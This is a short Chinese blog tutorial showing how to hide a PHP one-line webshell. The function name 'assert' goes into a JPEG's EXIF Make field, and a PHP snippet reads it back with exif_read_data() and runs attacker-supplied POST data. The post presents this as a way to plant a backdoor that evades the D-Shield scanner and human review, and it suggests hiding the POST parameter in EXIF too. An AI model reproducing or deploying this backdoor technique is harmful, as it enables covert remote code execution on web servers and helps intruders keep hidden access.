利用exif_read_data()函数,高级藏匿PHP一句话后门

EXIF信息: 是可交换图像文件的缩写,是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。所有的JPEG文件以字符串“0xFFD8”开头,并以字符串“0xFFD9”结束。文件头中有一系列“0xFF??”格式的字符串,称为“标识”,用来标记JPEG文件的信息段。“0xFFD8”表示图像信息开始,“0xFFD9”表示图像信息结束,这两个标识后面没有信息,而其它标识紧跟一些信息字符。

其实就是这个玩意儿:选定图片右键选择属性,在详细信息里面可以看到。(这里我们这张图片没有EXIF信息,待会添加就可以了)

《利用exif_read_data()函数,高级藏匿PHP一句话后门》

php里面有一个函数exif_read_data(),可以取得图片的EXIF信息头, 但是需要开启php_exif模块 。

用到了一个小软件, PowerExif ,下载地址为:

http://www.pc6.com/softview/SoftView_68705.html

免费版可以修改部分EXIF信息头,但是对我们来说已经足够了。

打开工具,点击添加,在修改机型信息,如下:

《利用exif_read_data()函数,高级藏匿PHP一句话后门》

 

我们添加一个Make厂商,加入项目内容assert,保存完以后上传到服务器

《利用exif_read_data()函数,高级藏匿PHP一句话后门》

 

然后我们再在php文件里用exif_read_data()函数调用出来并且做一下变形。

<?php

$exif = exif_read_data (‘./tupian.jpg’);$high=($exif[‘Make’]);$wide=”${${high}($_POST[123])}”;

?>

《利用exif_read_data()函数,高级藏匿PHP一句话后门》

D盾免杀,连1级别都检测不出来。人眼也比较难分辨出来

可以把POST也写入exif,这样更加隐蔽

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注